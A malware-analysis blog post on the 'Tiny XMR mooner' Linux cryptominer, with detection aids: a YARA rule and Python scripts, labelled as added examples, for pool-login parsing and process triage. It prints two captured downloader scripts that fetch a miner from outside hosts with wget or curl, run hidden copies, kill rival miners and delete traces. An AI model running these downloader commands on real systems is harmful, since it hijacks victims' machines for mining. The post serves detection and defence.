xorl %eax, %eax

The “Tiny XMR mooner” Linux cryptominer malware


A few days ago I posted a blog post about a cryptominer that is becoming very popular. Yesterday I had a look at two new samples (this and this) which are slightly different. Here is the downloader of the first one.

#!/bin/sh
( wget -qO - http://37.187.107.139/.x/xmrt.priv > /tmp/x ) || ( curl http://37.187.107.139/.x/xmrt.priv > /tmp/x )
chmod +x /tmp/x
/tmp/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x /dev/shm/x
/dev/shm/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x /var/tmp/x
/var/tmp/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x x
./x -o 206.253.164.158:443 > /dev/null 2>&1 &

sleep 30
rm -rf /tmp/x
rm -rf x
rm -rf /dev/shm/x
rm -rf /var/tmp/x

It uses slightly cleverer logic: it runs either wget or curl rather than both, and it starts four copies of the cryptominer, from /tmp/x, /dev/shm/x, /var/tmp/x and ./x, all pointed at 206.253.164.158 (privpool.mone.ro.lt) on port 443 for Monero (XMR) mining. Thirty seconds later the script deletes all four files, so the running miners survive only in memory. The cryptominer, hosted on the server under .x/xmrt.priv, is the “Tiny XMR mooner”, which is only about 500KB in size. Below you can see its command line options.

+ Tiny XMR mooner.
+
+  ./mooner -o poolurl.net:3333 -u username -p password
+
+  threads, affinity, and everything else is on automatically precalculated for you.
+
+  -o        stratum pool url
+            stratum+tcp://poolurl.net:3333 or simply poolurl.net:3333
+  -u        username or monero wallet address
+  -p        password or email/difficulty (on some pools)
+  -F        bring process to foreground, (background by default)
+  -h        halp plz. :^)
+
+  this is a rip-off of a miner. sends some hashes to the dev. if you dont want that, choose another one.
+  more hashes for you tho. Especially optimized for Xeons and Core since Nehalem.

The downloader of the second sample is a combination of the above and the one shown in my previous post. The cleanup code at the beginning (killing anything whose process listing matches muhsti, cryptonight or stratum) is similar to the old sample, but the execution is more like the one listed above. It is also worth noting that it uses exactly the same miner, served as xmrt32.priv from an identically named .x/ location on a different web server, and the same Monero (XMR) pool. This one, however, starts three processes, from /tmp/systemd, /dev/shm/systemd and ./systemd, as you can see below.

#!/bin/sh
kill -9 `ps x | grep muhsti | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
kill -9 `ps x | grep cryptonight | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
kill -9 `ps x | grep stratum | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
( wget -qO - http://122.255.11.221/.x/xmrt32.priv > /tmp/systemd ) || ( curl http://122.255.11.221/.x/xmrt32.priv > /tmp/systemd )
chmod +x /tmp/systemd
chmod 700 /tmp/systemd
/tmp/systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/systemd /dev/shm/systemd
/dev/shm/systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/systemd systemd
./systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
sleep 30
rm -rf /tmp/systemd
rm -rf systemd
rm -rf /dev/shm/systemd

The “Tiny XMR mooner” has some unique characteristics. Regarding its communication protocol, on startup it opens a socket to the pool and sends a JSON-RPC login request similar to the following; the agent string (xmrt/0.1.2) identifies the miner and is a cheap network indicator.

{"method":"login","params":{"login":"<USERNAME>","pass":"<PASSWORD>","agent":"xmrt/0.1.2"},"id":1}

The expected response is a JSON encoded string that includes the job the miner will start working on. A typical response looks like this:

{"jsonrpc":"2.0","result":{"job":{"blob":"<HASH OF THE JOB>","target":"<TARGET HASH>","job_id":"<UUID OF THE JOB>","time_to_live":5},"status":"OK","id":"<HASHED ID>"},"id":1,"error":null}
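The exchange above, worked through in Python as an added example (this is not code from the original post or from the miner itself): one function builds the login line in exactly the shape the miner sends, one parses the pool's reply into the fields a miner needs (and rejects an error reply), and a third scans captured payload lines for the login so the agent string can be used as a detection. The blob, target, job_id and session id in the sample reply are constructed placeholders, as is the sample capture; the wallet address is made up. Since the help output only offers stratum+tcp and the downloaders pass a bare host:443, this JSON is presumably sent in cleartext on 443, which is why a sensor can see it at all.

```python
import json

# Agent string the sample sends in its login request (taken from the request shown above).
XMRT_AGENT = "xmrt/0.1.2"


def build_login(login, password, agent=XMRT_AGENT, req_id=1):
    """Serialise the login request exactly as the miner sends it: one JSON object per line."""
    msg = {
        "method": "login",
        "params": {"login": login, "pass": password, "agent": agent},
        "id": req_id,
    }
    return json.dumps(msg, separators=(",", ":")) + "\n"


def parse_login_response(line):
    """Parse the pool's reply and return the fields the miner needs to start hashing.

    Raises ValueError when the pool reports an error or a non-OK status, which a
    miner has to handle before it touches the job.
    """
    msg = json.loads(line)
    if msg.get("error") is not None:
        raise ValueError("pool rejected login: %r" % (msg["error"],))
    result = msg.get("result") or {}
    if result.get("status") != "OK":
        raise ValueError("unexpected status: %r" % (result.get("status"),))
    job = result["job"]
    return {
        "session_id": result["id"],  # per-connection id the pool expects back in later messages
        "job_id": job["job_id"],
        "blob": job["blob"],
        "target": job["target"],
    }


def find_miner_logins(payload_lines, agent_prefixes=("xmrt/",)):
    """Scan captured payload lines for cryptonote-style pool logins.

    Returns one record per login seen and flags agents matching a known miner
    prefix. Non-JSON lines and other JSON-RPC methods are ignored.
    """
    hits = []
    for raw in payload_lines:
        raw = raw.strip()
        if not raw.startswith("{"):
            continue
        try:
            msg = json.loads(raw)
        except ValueError:  # json.JSONDecodeError is a ValueError
            continue
        if msg.get("method") != "login":
            continue
        params = msg.get("params") or {}
        agent = str(params.get("agent", ""))
        hits.append({
            "login": params.get("login"),
            "agent": agent,
            "known_miner": agent.startswith(tuple(agent_prefixes)),
        })
    return hits


# Constructed sample data: placeholder blob/target/ids in the shape shown above, not a real job.
SAMPLE_POOL_REPLY = (
    '{"jsonrpc":"2.0","result":{"job":{"blob":"0707deadbeef","target":"b88d0600",'
    '"job_id":"c0ffee11-0000-4000-8000-000000000001","time_to_live":5},'
    '"status":"OK","id":"9f86d081"},"id":1,"error":null}'
)
SAMPLE_REJECT = '{"jsonrpc":"2.0","result":null,"id":1,"error":{"code":-1,"message":"Unauthenticated"}}'
SAMPLE_CAPTURE = [  # constructed: what a sensor logging payloads to 206.253.164.158:443 might record
    build_login("4ABCDwalletaddress", "x").rstrip("\n"),
    SAMPLE_POOL_REPLY,
    "GET / HTTP/1.1",
    '{"method":"submit","params":{"id":"9f86d081","job_id":"c0ffee11-0000-4000-8000-000000000001",'
    '"nonce":"1a2b3c4d","result":"00"},"id":2}',
]

if __name__ == "__main__":
    print(build_login("4ABCDwalletaddress", "x"), end="")
    print(parse_login_response(SAMPLE_POOL_REPLY))
    print(find_miner_logins(SAMPLE_CAPTURE))
```

Matching on the agent string alone is brittle (the miner is a "rip-off" of another miner and the string is trivially changed), so in practice it belongs alongside the destination-based indicators below rather than replacing them.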

The miner is a 32-bit, statically linked, stripped ELF binary. On startup it uses clone() to spawn a background copy of itself which (for this sample) is hardcoded to name itself “sh”. It also checks whether /tmp/.xmrt exists; this is the miner's lock file, and if it is already there no new process is started. Just like in the previous cryptominer post, here is a YARA rule you can use to scan your system for the Monero cryptominer described here.

import "hash"
 
rule tiny_xmr_mooner_miner
{
    meta:
        author = "Anastasios Pingios (xorl)"
        description = "Linux Tiny XMR mooner miner"
        reference = "https://xorl.wordpress.com/2017/12/21/the-tiny-xml-mooner-linux-cryptominer-malware/"
        date = "21-12-2017"
        filename = "xmrt32"
        filename = "/tmp/x"
        filename = "/dev/shm/x"
        filename = "/var/tmp/x"
        filename = "/tmp/systemd"
        filename = "/dev/shm/systemd"
        filename = "/tmp/.xmrt"
 
    strings:
        $host_1 = "37.187.107.139" ascii
        $host_2 = "206.253.164.158" ascii
        $host_3 = "122.255.11.221" ascii
        $host_4 = "privpool.mone.ro.lt" ascii
        $host_5 = "donate.xmrt.pro" ascii
         
        $binary_1 = { C2 33 CF 50 35 }
        $binary_2 = { 3D DF D1 D7 66 BA CE A0 89 F0 DC CA CA BB 55 B7 2D 72 10 3E 75 }
        $binary_3 = { 77 AE A7 41 C6 0C E5 53 36 E5 F6 1A F9 53 7A DA 9A E9 }
         
    condition:
        2 of ($host*) or
        2 of ($binary*) or
        filesize < 600KB and hash.sha256(0, filesize) == "8a0d9c84cfb86dd1f8c9acab87738d2cb82106aee0d88396f6fa86265ff252dd"
}
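The YARA rule only helps while the binary is still on disk, and both downloaders delete their copies 30 seconds after launch. The process-level behaviour described above (a background copy named "sh", binaries started from /tmp, /dev/shm and /var/tmp and then unlinked, the -o host:port argument) can be checked on a live host without the file. The following triage script is an added example, not part of the original post: the record fields mirror what /proc/<pid>/comm, exe and cmdline expose, the sample records are constructed, and whether the renamed "sh" copy keeps its original argv is an assumption, so one constructed record deliberately has no -o argument and is caught by the exe link alone.

```python
import os
import re

VOLATILE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")  # drop locations used by both downloaders
LOCK_FILE = "/tmp/.xmrt"                              # the miner's lock file
POOL_OPT = re.compile(r"-o\s+(\S+?):(\d+)")            # the "-o host:port" argument
REAL_SHELLS = ("sh", "dash", "bash", "busybox")        # what a genuine "sh" may resolve to


def classify_process(proc):
    """Return the indicators one process record matches (empty list = nothing suspicious).

    proc carries the fields a triage script reads from /proc/<pid>/: comm, exe
    (readlink of /proc/<pid>/exe) and cmdline (argv joined with spaces).
    """
    reasons = []
    exe = proc.get("exe", "")
    cmdline = proc.get("cmdline", "")
    if exe.startswith(VOLATILE_DIRS):
        reasons.append("exe in volatile dir")
    # After the downloader's rm -rf the file is gone but the process lives on;
    # the kernel then reports the exe link as "<path> (deleted)".
    if exe.endswith(" (deleted)"):
        reasons.append("exe unlinked while running")
    m = POOL_OPT.search(cmdline)
    if m:
        reasons.append("pool arg %s:%s" % m.groups())
    # The sample renames its background copy to "sh"; a real sh's exe is a shell binary.
    exe_name = os.path.basename(exe.replace(" (deleted)", ""))
    if proc.get("comm") == "sh" and exe_name not in REAL_SHELLS:
        reasons.append("comm 'sh' but exe is %s" % exe_name)
    return reasons


def triage(records):
    """Map pid -> indicators for every record that matched at least one."""
    hits = {}
    for rec in records:
        reasons = classify_process(rec)
        if reasons:
            hits[rec["pid"]] = reasons
    return hits


def snapshot_processes(proc_root="/proc"):
    """Collect the same fields from a live /proc; entries we cannot read are skipped."""
    records = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
            exe = os.readlink(os.path.join(base, "exe"))  # fails for kernel threads / other users
        except OSError:
            continue
        records.append({"pid": int(pid), "comm": comm, "exe": exe, "cmdline": cmdline})
    return records


# Constructed records mirroring a host 30 s after the first downloader ran (not real captures).
# Whether the renamed "sh" copy keeps its argv is an assumption, so pid 4243 has none.
SAMPLE_RECORDS = [
    {"pid": 1, "comm": "systemd", "exe": "/usr/lib/systemd/systemd", "cmdline": "/sbin/init"},
    {"pid": 900, "comm": "sh", "exe": "/usr/bin/dash", "cmdline": "sh -c sleep 30"},
    {"pid": 4242, "comm": "sh", "exe": "/tmp/x (deleted)", "cmdline": "/tmp/x -o 206.253.164.158:443"},
    {"pid": 4243, "comm": "sh", "exe": "/dev/shm/x (deleted)", "cmdline": "sh"},
]

if __name__ == "__main__":
    print("sample records:", triage(SAMPLE_RECORDS))
    print("lock file %s present: %s" % (LOCK_FILE, os.path.exists(LOCK_FILE)))
    for pid, reasons in sorted(triage(snapshot_processes()).items()):
        print(pid, "; ".join(reasons))
```

Run it as root so /proc/<pid>/exe of other users' processes is readable; a hit on the lock file or on a deleted exe under one of the volatile directories is worth a memory dump of that process before it is killed, since the binary itself is no longer on disk.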

Written by xorl

December 21, 2017 at 22:12

Posted in malware
